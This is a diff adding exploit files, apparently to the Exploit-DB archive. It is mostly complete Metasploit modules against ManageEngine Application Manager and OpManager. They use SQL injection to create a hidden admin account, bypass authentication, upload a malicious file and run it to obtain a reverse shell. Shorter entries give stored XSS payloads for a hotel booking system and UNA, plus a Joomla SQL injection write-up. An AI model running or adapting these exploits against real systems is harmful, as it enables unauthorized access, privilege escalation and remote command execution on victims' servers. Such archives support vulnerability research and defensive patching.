+        'displayname' => @display,
+        'serversite' => 'local',
+        'choosehost' => -2,
+        'abortafter' => 5,
+        'command' => fname,
+        'execProgExecDir' => dir,
+        'cancel' => 'false'
+      }
+    )
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success')
+      actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0] 
+      print_status("Transactions completed. Attempting to get a session...")
+      exec(host, port, cookie, actionid)
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred!')
+    end
+  end
+
+  def exec(host, port, cookie, action)
+    send_request_cgi(
+      'method'  => 'GET',
+      'rhost'   => host,
+      'rport'   => port,
+      'uri'     =>  normalize_uri(target_uri.path, 'common', 'executeScript.do'),
+      'cookie'  => cookie,
+      'vars_get' => {
+        'method' => 'testAction',
+        'actionID' => action,
+        'haid' => 'null'
+      }
+    )
+  end
+ 
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+ 
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_good(msg='')
+    super("#{peer} - #{msg}")
+  end 
+
+  def check
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'apiclient', 'ember', 'Login.jsp'),
+    )
+    # For this part the build control will be placed.
+    # For now, AppManager plugin control is sufficient.
+    if res && res.code == 200 && res.body.include?('Logout.do?showPreLogin=false')
+      return Exploit::CheckCode::Vulnerable
+    else 
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def app_login
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'apiclient', 'ember', 'Login.jsp'),
+    )
+    
+    appm_adr = res.body.split('<iframe src="')[1].split('/Logout.do?showPreLogin=false')[0]
+    am_host = appm_adr.split('://')[1].split(':')[0]
+    am_port = appm_adr.split('://')[1].split(':')[1]
+
+
+    if res && res.code == 200 && res.body.include?('.loginForm')
+      @cookie = res.get_cookies
+
+      res = send_request_cgi(
+        'rhost'   => am_host,
+        'rport'   => am_port,
+        'method'  => 'GET',
+        'cookie'  => @cookie,
+        'uri'     =>  '/Logout.do?showPreLogin=true',
+      )
+
+      appm_cookie = 'JSESSIONID_APM_' << res.headers['set-cookie'].split('JSESSIONID_APM_')[1].split('; ')[0]
+    else
+      print_error("APM Plugin does not working!")
+    end
+
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     =>  normalize_uri(target_uri.path, 'apiclient', 'ember', 'j_security_check'),
+      'vars_post' => {
+        'j_username' => datastore['USERNAME'],
+        'j_password' => datastore['PASSWORD']
+      }
+    )
+
+    if res && res.code == 302
+      print_good("Successful login OPM with user : #{datastore['USERNAME']}")
+      @cookie = res.get_cookies
+      saltcookie = res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0]
+
+      res = send_request_cgi(
+        'method'  => 'GET',
+        'uri'     =>  normalize_uri(target_uri.path, ';jsessionid=' + saltcookie),
+        'cookie'  => @cookie,
+      )
+      @cookie = res.get_cookies
+
+      res = send_request_cgi(
+        'method'  => 'GET',
+        'uri'     =>  normalize_uri(target_uri.path, 'apiclient', 'ember', 'index.jsp'),
+        'cookie'  => @cookie,
+      )
+      cookie = @cookie + " " + res.get_cookies
+
+      res = send_request_cgi(
+        'rhost'   => am_host,
+        'rport'   => am_port,
+        'method'  => 'GET',
+        'uri'     =>  normalize_uri(target_uri.path, '/MyPage.do?method=viewDashBoard&plugin_view=true&PRINTER_FRIENDLY=true&opm_user=' + datastore['USERNAME']),
+        'cookie'  => cookie
+      )
+
+      @cookie = cookie + " " + res.get_cookies 
+
+      res = send_request_cgi(
+        'method'  => 'POST',
+        'rhost'   => am_host,
+        'rport'   => am_port,
+        'cookie'   => @cookie,
+        'uri'     =>  normalize_uri(target_uri.path, '/j_security_check'),
+        'vars_post' => {
+          'j_username' => datastore['USERNAME'],
+          'j_password' => datastore['USERNAME'] + "@opm",
+          'submit' => 'Login'
+        }
+      )
+
+      res = send_request_cgi(
+        'rhost'   => am_host,
+        'rport'   => am_port,
+        'method'  => 'GET',
+        'uri'     =>  normalize_uri(target_uri.path, '/MyPage.do?method=viewDashBoard&plugin_view=true&PRINTER_FRIENDLY=true&opm_user=' + datastore['USERNAME']),
+        'cookie'   => @cookie
+      )
+      
+      @cookies = @cookie + " " + res.get_cookies
+      send_sqli(am_host, am_port, @cookies, @cookie)
+
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred! User information is incorrect.')
+    end
+  end
+
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+    app_login
+  end
+
+  def send_sqli(host, port, cookies, cookie)
+
+    @uname = Rex::Text.rand_text_alpha_lower(6)
+    uid = rand_text_numeric(3)
+    apk = rand_text_numeric(6) 
+    @pwd = rand_text_alphanumeric(8+rand(9))
+    @uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)"
+    pg_user ="" 
+    pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+"
+    pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);"
+    pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+"
+    ms_user =""
+    ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR},"
+    ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});"
+    ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--"
+
+    res = send_request_cgi(
+      'rhost'   => host,
+      'rport'   => port,
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, '/jsp/NewThresholdConfiguration.jsp?resourceid=' + pg_user + '&attributeIDs=17,18&attributeToSelect=18'),
+      'cookie'   => cookies
+    )
+
+    res = send_request_cgi(
+      'rhost'   => host,
+      'rport'   => port,
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, '/jsp/NewThresholdConfiguration.jsp?resourceid=' + ms_user + '&attributeIDs=17,18&attributeToSelect=18'),
+      'cookie'   => cookies
+    )
+
+    res = send_request_cgi(
+      'rhost'   => host,
+      'rport'   => port,
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+    )
+
+    if res && res.code == 200 && res.body.include?('.loginDiv')
+      @cookie = res.get_cookies
+
+      res = send_request_cgi(
+        'method'  => 'POST',
+        'rhost'   => host,
+        'rport'   => port,
+        'cookie'   => @cookie,
+        'uri'     =>  normalize_uri(target_uri.path, '/j_security_check'),
+        'vars_post' => {
+          'clienttype' => 'html',
+          'j_username' => @uname,
+          'j_password' => @pwd,
+          'submit' => 'Login'
+        }
+      )
+
+      if res && res.code == 302 && res.body.include?('Redirecting to')
+        print_good("Privilege Escalation was successfully performed.")
+        print_good("New APM admin username = " + @uname)
+        print_good("New APM admin password = " + @pwd)
+        res = send_request_cgi(
+          'rhost'   => host,
+          'rport'   => port,
+          'cookie'  => @cookie,
+          'method'  => 'GET',
+          'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+        )
+
+        @cookie = res.get_cookies
+        check_platform(host, port, @cookie)
+      else
+        fail_with(Failure::NotVulnerable, 'Failed to perform privilege escalation!')
+      end
+    else
+      fail_with(Failure::NotVulnerable, 'Something went wrong!')
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/47228.rb b/exploits/multiple/remote/47228.rb
new file mode 100755
index 000000000..f97d6c1ef
--- /dev/null
+++ b/exploits/multiple/remote/47228.rb
@@ -0,0 +1,335 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+ 
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ManageEngine Application Manager v14.2 - Privilege Escalation / Remote Command Execution",
+      'Description'    => %q(
+        This module exploits sqli and command injection vulnerability in the ME Application Manager v14.2 and prior versions.
+ 
+        Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides privilege escalation.
+        Therefore low authority user can gain the authority of "system" on the server. 
+        It uploads malicious file using the "Execute Program Action(s)" feature of Application Manager.
+
+        /////// This 0day has been published at DEFCON-AppSec Village. ///////
+
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://pentest.com.tr/exploits/DEFCON-ManageEngine-APM-v14-Privilege-Escalation-Remote-Command-Execution.html' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 60,
+          'RPORT' => 9090,
+          'SSL' => false,
+          'PAYLOAD' => 'generic/shell_reverse_tcp'
+        },
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'Platform'       => ['unix', 'win'],
+      'Targets' =>
+        [
+          [ 'Windows Target',
+            {
+              'Platform' => ['win'],
+              'Arch' => ARCH_CMD,
+            }
+          ],
+          [ 'Linux Target',
+            {
+              'Platform' => ['unix'],
+              'Arch' => ARCH_CMD,
+              'Payload' =>
+                {
+                  'Compat' =>
+                    {
+                      'PayloadType' => 'cmd',
+                    }
+                }
+            }
+          ]
+        ],
+      'DisclosureDate' => '10 August 2019 //DEFCON',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('USERNAME',  [true, 'OpManager Username']),
+        OptString.new('PASSWORD',  [true, 'OpManager Password']),
+        OptString.new('TARGETURI',  [true, 'Base path for ME application', '/'])
+      ],self.class)
+  end
+
+  def check_platform(cookie)
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'showTile.do'),
+      'cookie'  => cookie,
+      'vars_get' => {
+        'TileName' => '.ExecProg',
+        'haid' => 'null',
+      }
+    )
+    if res && res.code == 200 && res.body.include?('createExecProgAction')
+      @dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0]
+      if @dir =~ /:/
+        platform = Msf::Module::Platform::Windows
+      else 
+        platform = Msf::Module::Platform::Unix
+      end
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
+    end
+    file_up(cookie, platform, @dir)
+  end
+
+  def file_up(cookie, platform, dir)
+    if platform == Msf::Module::Platform::Windows
+      filex = ".bat"
+    else
+      if payload.encoded =~ /sh/
+        filex = ".sh"
+      elsif payload.encoded =~ /perl/
+        filex = ".pl"
+      elsif payload.encoded =~ /awk 'BEGIN{/
+        filex = ".sh"
+      elsif payload.encoded =~ /python/
+        filex = ".py"
+      elsif payload.encoded =~ /ruby/
+        filex = ".rb"
+      else
+        fail_with(Failure::Unknown, 'Payload type could not be checked!')
+      end
+    end
+ 
+    @fname= rand_text_alpha(9 + rand(3)) + filex
+    data = Rex::MIME::Message.new
+    data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
+ 
+    res = send_request_cgi({
+      'method' => 'POST',    
+      'data'  => data.to_s,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri, "Upload.do")     
+    })
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success')
+      print_good("#{@fname} malicious file has been uploaded.")
+      create_exec_prog(cookie, dir, @fname)
+    else
+      fail_with(Failure::Unknown, 'The file could not be uploaded!')
+    end
+  end
+
+  def create_exec_prog(cookie, dir, fname)
+ 
+    @display = rand_text_alphanumeric(7)
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     =>  normalize_uri(target_uri.path, 'adminAction.do'),
+      'cookie'  => cookie,
+      'vars_post' => {
+        'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
+        'method' => 'createExecProgAction',
+        'id' => 0,
+        'displayname' => @display,
+        'serversite' => 'local',
+        'choosehost' => -2,
+        'abortafter' => 5,
+        'command' => fname,
+        'execProgExecDir' => dir,
+        'cancel' => 'false'
+      }
+    )
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success')
+      actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0] 
+      print_status("Transactions completed. Attempting to get a session...")
+      exec(cookie, actionid)
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred!')
+    end
+  end
+
+  def exec(cookie, action)
+    send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'common', 'executeScript.do'),
+      'cookie'  => cookie,
+      'vars_get' => {
+        'method' => 'testAction',
+        'actionID' => action,
+        'haid' => 'null'
+      }
+    )
+  end
+ 
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+ 
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_good(msg='')
+    super("#{peer} - #{msg}")
+  end 
+
+  def check
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'index.do'),
+    )
+    # For this part the build control will be placed.
+    if res && res.code == 200 && res.body.include?('Build No:142')
+      return Exploit::CheckCode::Vulnerable
+    else 
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def app_login
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+    )
+
+    if res && res.code == 200 && res.body.include?('.loginDiv')
+      @cookie = res.get_cookies
+
+      res = send_request_cgi(
+        'method'  => 'POST',
+        'cookie'   => @cookie,
+        'uri'     =>  normalize_uri(target_uri.path, '/j_security_check'),
+        'vars_post' => {
+          'clienttype' => 'html',
+          'j_username' => datastore['USERNAME'],
+          'j_password' => datastore['PASSWORD'],
+          'submit' => 'Login'
+        }
+      )
+
+      if res && res.code == 303
+        res = send_request_cgi(
+          'cookie'  => @cookie,
+          'method'  => 'GET',
+          'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+        )
+
+        @cookie = res.get_cookies
+        send_sqli(@cookie)
+      else
+        fail_with(Failure::NotVulnerable, 'Failed to perform privilege escalation!')
+      end     
+
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred! User information is incorrect.')
+    end
+  end
+
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+    app_login
+  end
+
+  def send_sqli(cookies)
+
+    @uname = Rex::Text.rand_text_alpha_lower(6)
+    uid = rand_text_numeric(3)
+    apk = rand_text_numeric(6) 
+    @pwd = rand_text_alphanumeric(8+rand(9))
+    @uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)"
+    pg_user ="" 
+    pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+"
+    pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);"
+    pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+"
+    ms_user =""
+    ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR},"
+    ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});"
+    ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--"
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, '/jsp/NewThresholdConfiguration.jsp?resourceid=' + pg_user + '&attributeIDs=17,18&attributeToSelect=18'),
+      'cookie'   => cookies
+    )
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, '/jsp/NewThresholdConfiguration.jsp?resourceid=' + ms_user + '&attributeIDs=17,18&attributeToSelect=18'),
+      'cookie'   => cookies
+    )
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+    )
+
+    if res && res.code == 200 && res.body.include?('.loginDiv')
+      @cookie = res.get_cookies
+
+      res = send_request_cgi(
+        'method'  => 'POST',
+        'cookie'   => @cookie,
+        'uri'     =>  normalize_uri(target_uri.path, '/j_security_check'),
+        'vars_post' => {
+          'clienttype' => 'html',
+          'j_username' => @uname,
+          'j_password' => @pwd,
+          'submit' => 'Login'
+        }
+      )
+      print @uname + "//" + @pwd
+      puts res.body
+      if res && res.code == 303
+        print_good("Privilege Escalation was successfully performed.")
+        print_good("New APM admin username = " + @uname)
+        print_good("New APM admin password = " + @pwd)
+        res = send_request_cgi(
+          'cookie'  => @cookie,
+          'method'  => 'GET',
+          'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+        )
+
+        @cookie = res.get_cookies
+        check_platform(@cookie)
+      else
+        fail_with(Failure::NotVulnerable, 'Failed to perform privilege escalation!')
+      end
+    else
+      fail_with(Failure::NotVulnerable, 'Something went wrong!')
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/47229.rb b/exploits/multiple/remote/47229.rb
new file mode 100755
index 000000000..60434ccf8
--- /dev/null
+++ b/exploits/multiple/remote/47229.rb
@@ -0,0 +1,292 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+ 
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ManageEngine OpManager v12.4x - Unauthenticated Remote Command Execution",
+      'Description'    => %q(
+        This module bypasses the user password requirement in the OpManager v12.4.034 and prior versions.
+        It performs authentication bypass and executes commands on the server.
+
+        /////// This 0day has been published at DEFCON-AppSec Village. ///////
+
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://pentest.com.tr/exploits/DEFCON-ManageEngine-OpManager-v12-4-Unauthenticated-Remote-Command-Execution.html' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 60,
+          'RPORT' => 8060,
+          'SSL' => false,
+          'PAYLOAD' => 'generic/shell_reverse_tcp'
+        },
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'Platform'       => ['unix', 'win'],
+      'Targets' =>
+        [
+          [ 'Windows Target',
+            {
+              'Platform' => ['win'],
+              'Arch' => ARCH_CMD,
+            }
+          ],
+          [ 'Linux Target',
+            {
+              'Platform' => ['unix'],
+              'Arch' => ARCH_CMD,
+              'Payload' =>
+                {
+                  'Compat' =>
+                    {
+                      'PayloadType' => 'cmd',
+                    }
+                }
+            }
+          ]
+        ],
+      'DisclosureDate' => '10 August 2019 //DEFCON',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('USERNAME',  [true, 'OpManager Username', 'admin']),
+        OptString.new('TARGETURI',  [true, 'Base path for ME application', '/'])
+      ],self.class)
+  end
+
+  def check_platform(host, port, cookie)
+
+    res = send_request_cgi(
+      'rhost'   => host,
+      'rport'   => port,
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'showTile.do'),
+      'cookie'  => cookie,
+      'vars_get' => {
+        'TileName' => '.ExecProg',
+        'haid' => 'null',
+      }
+    )
+    if res && res.code == 200 && res.body.include?('createExecProgAction')
+      @dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0]
+      if @dir =~ /:/
+        platform = Msf::Module::Platform::Windows
+      else 
+        platform = Msf::Module::Platform::Unix
+      end
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
+    end
+    file_up(host, port, cookie, platform, @dir)
+  end
+
+  def file_up(host, port, cookie, platform, dir)
+    if platform == Msf::Module::Platform::Windows
+      filex = ".bat"
+    else
+      if payload.encoded =~ /sh/
+        filex = ".sh"
+      elsif payload.encoded =~ /perl/
+        filex = ".pl"
+      elsif payload.encoded =~ /awk 'BEGIN{/
+        filex = ".sh"
+      elsif payload.encoded =~ /python/
+        filex = ".py"
+      elsif payload.encoded =~ /ruby/
+        filex = ".rb"
+      else
+        fail_with(Failure::Unknown, 'Payload type could not be checked!')
+      end
+    end
+ 
+    @fname= rand_text_alpha(9 + rand(3)) + filex
+    data = Rex::MIME::Message.new
+    data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
+ 
+    res = send_request_cgi({
+      'rhost'   => host,
+      'rport'   => port,
+      'method' => 'POST',    
+      'data'  => data.to_s,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri, "Upload.do")     
+    })
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success')
+      print_good("#{@fname} malicious file has been uploaded.")
+      create_exec_prog(host, port, cookie, dir, @fname)
+    else
+      fail_with(Failure::Unknown, 'The file could not be uploaded!')
+    end
+  end
+
+  def create_exec_prog(host, port, cookie, dir, fname)
+ 
+    @display = rand_text_alphanumeric(7)
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'rhost'   => host,
+      'rport'   => port,
+      'uri'     =>  normalize_uri(target_uri.path, 'adminAction.do'),
+      'cookie'  => cookie,
+      'vars_post' => {
+        'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
+        'method' => 'createExecProgAction',
+        'id' => 0,
+        'displayname' => @display,
+        'serversite' => 'local',
+        'choosehost' => -2,
+        'abortafter' => 5,
+        'command' => fname,
+        'execProgExecDir' => dir,
+        'cancel' => 'false'
+      }
+    )
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success')
+      actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0] 
+      print_status("Transactions completed. Attempting to get a session...")
+      exec(host, port, cookie, actionid)
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred!')
+    end
+  end
+
+  def exec(host, port, cookie, action)
+    send_request_cgi(
+      'method'  => 'GET',
+      'rhost'   => host,
+      'rport'   => port,
+      'uri'     =>  normalize_uri(target_uri.path, 'common', 'executeScript.do'),
+      'cookie'  => cookie,
+      'vars_get' => {
+        'method' => 'testAction',
+        'actionID' => action,
+        'haid' => 'null'
+      }
+    )
+  end
+ 
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+ 
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_good(msg='')
+    super("#{peer} - #{msg}")
+  end 
+
+  def check
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'apiclient', 'ember', 'Login.jsp'),
+    )
+
+    if res && res.code == 200 && res.body.include?('Logout.do?showPreLogin=false')
+      appm_adr = res.body.split('<iframe src="')[1].split('/Logout.do?showPreLogin=false')[0]
+      am_host = appm_adr.split('://')[1].split(':')[0]
+      am_port = appm_adr.split('://')[1].split(':')[1]
+
+      res = send_request_cgi(
+        'rhost'   => am_host,
+        'rport'   => am_port,
+        'method'  => 'GET',
+        'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+      )
+      # Password check vulnerability in Java Script :/
+      if res.body.include?('j_password.value=username')
+        return Exploit::CheckCode::Vulnerable
+      else 
+        return Exploit::CheckCode::Safe
+      end
+    else 
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def app_login
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'apiclient', 'ember', 'Login.jsp'),
+    )
+    
+    appm_adr = res.body.split('<iframe src="')[1].split('/Logout.do?showPreLogin=false')[0]
+    am_host = appm_adr.split('://')[1].split(':')[0]
+    am_port = appm_adr.split('://')[1].split(':')[1]
+
+    res = send_request_cgi(
+      'rhost'   => am_host,
+      'rport'   => am_port,
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+    )
+
+    @cookie = res.get_cookies
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'rhost'   => am_host,
+      'rport'   => am_port,
+      'cookie'   => @cookie,
+      'uri'     =>  normalize_uri(target_uri.path, '/j_security_check'),
+      'vars_post' => {
+        'clienttype' => 'html',
+        'j_username' => datastore['USERNAME'],
+        'j_password' => datastore['USERNAME'] + "@opm",
+        'submit' => 'Login'
+      }
+    )
+
+    if res && res.code == 302 or 303
+      print_good("Authentication bypass was successfully performed.")
+      res = send_request_cgi(
+        'rhost'   => am_host,
+        'rport'   => am_port,
+        'cookie'  => @cookie,
+        'method'  => 'GET',
+        'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+      )
+
+      @cookie = res.get_cookies
+      check_platform(am_host, am_port, @cookie)
+    else
+      fail_with(Failure::NotVulnerable, 'Failed to perform authentication bypass! Try with another username...')
+    end
+  end
+
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+    app_login
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47219.txt b/exploits/php/webapps/47219.txt
new file mode 100644
index 000000000..4b8ad1c00
--- /dev/null
+++ b/exploits/php/webapps/47219.txt
@@ -0,0 +1,21 @@
+# Exploit Title:BSI Advance Hotel Booking System Persistent XSS
+# Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc
+# Date: Wed Jun 4 2014
+# Exploit Author: Angelo Ruwantha
+# Vendor Homepage: http://www.bestsoftinc.com
+# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
+# Version: V2.0
+# Tested on: archlinux
+# CVE : CVE-2014-4035
+
+Vulnerability
+========================
+
+[+]Method:POST
+
+1.http://URL/hotel-booking/booking_details.php (;persistent XSS)
+
+allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=
+
+
+every parameter injectable :)
\ No newline at end of file
diff --git a/exploits/php/webapps/47221.txt b/exploits/php/webapps/47221.txt
new file mode 100644
index 000000000..beccd4a57
--- /dev/null
+++ b/exploits/php/webapps/47221.txt
@@ -0,0 +1,17 @@
+# Exploit Title: [UNA - 10.0.0-RC1 stored XSS vuln.]
+# Date: [2019 08 10]
+# Exploit Author: [Greg.Priest]
+# Vendor Homepage: [https://una.io/]
+# Software Link: [https://github.com/unaio/una/tree/master/studio]
+# Version: [UNA - 10.0.0-RC1]
+# Tested on: [Windows/Linux ]
+# CVE : [CVE-2019-14804]
+
+UNA-v.10.0.0-RC1 [Stored XSS Vulnerability]#1
+
+ Sign in to admin and look for the ["etemplates"] page (/studio/polyglot.php?page=etemplates)!
+ Click ["Emails"] and edit the templates! Inject the JavaScript code into the ["System Name"] field!
+ 
+ http://127.0.0.1/UNA/studio/polyglot.php?page=etemplates
+ 
+https://github.com/Gr3gPr1est/BugReport/blob/master/CVE-2019-14804.pdf
\ No newline at end of file
diff --git a/exploits/php/webapps/47222.txt b/exploits/php/webapps/47222.txt
new file mode 100644
index 000000000..0c47f9e62
--- /dev/null
+++ b/exploits/php/webapps/47222.txt
@@ -0,0 +1,33 @@
+#Exploit Title: Joomla! component com_jssupportticket - Authenticated SQL Injection
+#Dork: inurl:"index.php?option=com_jssupportticket"
+#Date: 10.08.19
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: https://www.joomsky.com/
+#Software Link: https://www.joomsky.com/46/download/1.html
+#Version: 1.1.6
+#Tested on: Debian/nginx/joomla 3.9.0
+#####################################
+#Vulnerability details:
+#####################################
+Vulnerable code is in line 31 in file admin/models/ticketreply.php
+	
+	...snip...
+    24	    function storeTicketReplies($ticketid, $message, $created, $data2) {
+    25	        if (!is_numeric($ticketid))
+    26	            return false;
+    27	
+    28	        //validate reply for break down
+    29	        $ticketrandomid   = $data2['ticketrandomid'];		//!!!
+    30	        $db = $this->getDBo();
+    31	        $query = "SELECT id FROM `#__js_ticket_tickets` WHERE ticketid='$ticketrandomid'";	//!!!
+    32	        $db->setQuery($query);
+    33	        $res = $db->loadResult();
+    34	        if($res != $ticketid){
+    35	            return false;
+    36	        }//end
+    ...snip...
+
+#####################################
+#PoC:
+#####################################
